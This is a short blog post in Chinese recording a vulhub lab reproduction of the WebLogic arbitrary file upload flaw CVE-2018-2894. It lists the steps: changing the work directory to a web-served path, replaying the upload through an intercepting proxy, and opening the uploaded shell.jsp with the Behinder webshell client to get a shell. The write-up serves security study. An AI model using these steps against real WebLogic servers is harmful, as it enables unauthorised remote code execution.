[面包]MrTwoC

你好，欢迎来到这个基于区块链的个人博客名字：面包 / MrTwoc 爱好：跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向：Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发

WebLogic任意檔案上傳

2024年2月13日#Web2Security #UpLoadFile27

AI 翻譯

這篇文章透過AI由英文翻譯成繁體中文。查看原文

AI 生成的摘要

在zh-TW語言中簡述這段內容： "在地址/root/CVE/vulhub-master/weblogic/CVE-2018-2894輸入docker-compose up -d，然後將工作目錄更改為/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css，點擊提交image.png，攔截並發送到Repeater中，再次發送報文。在這裡找到了需要的時間戳1686842225512，然後訪問鏈接http://192.168.1.4:7001/ws_utc/css/config/keystore/1686842225512_shell.jsp成功，然後使用冰蝎鏈接，就可以獲取shell。"

地址
/root/CVE/vulhub-master/weblogic/CVE-2018-2894
输入
docker-compose up -d

地址
http://192.168.1.4:7001/ws_utc/config.do

將工作目錄改為：
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
點擊提交

攔截下來，發送到 Repeater 中

再發送報文

這裡看到
1686842225512
找到了需要的時間戳
隨後訪問鏈接
http://192.168.1.4:7001/ws_utc/css/config/keystore/1686842225512_shell.jsp
成功，隨後利用冰蝎鏈接，就可以拿到 shell

此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。

區塊鏈編號
#60961-10
擁有者
0x4cc7cb48adf7c465a49f98aecafe7948450d85b2
交易雜湊值
創作 0xaeaf6fdd...6f153cb4eb 最後更新 0xaeaf6fdd...6f153cb4eb
IPFS 位址
ipfs://QmQHcJ1HGE6K9q1UgUJioPq1FPknYHCD1DQSuJ3AciGQDy